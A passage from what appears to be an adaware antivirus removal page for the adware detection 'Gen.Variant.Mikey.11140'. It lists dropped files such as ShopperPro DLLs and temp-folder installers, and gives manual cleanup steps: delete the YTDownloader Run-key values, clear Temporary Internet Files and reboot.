%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\setup.exe (2555480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszA.tmp (242363 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp\setup1.exe (229796 bytes)
%WinDir%\Tasks\ShopperPro.job (2150 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll (2321 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro64.dll (3361 bytes)
%Program Files%\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\database1_0_0.ej (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\caaig.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_e (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_d (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_a (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_c (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\setup[1].exe_b (130226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\vokcloqal.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\cnhwe.dll (2057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\Wptsit.tmp (333899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm12.tmp\Wiwyiyugmbkl.exe (1224639 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (82355 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\setup.exe (869966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\setup1.exe (79085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\ins_sense.exe (1509 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\ins_geforce.exe (1509 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\29UNGT6N\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\ins_shopperpro.exe (31368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UD6RSBGT\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y41BH0NX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KLQF81U3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_25149\bxsdk32.dll (9731 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Variant.Mikey.11140_7e90634f28

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Variant.Mikey.11140_7e90634f28

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet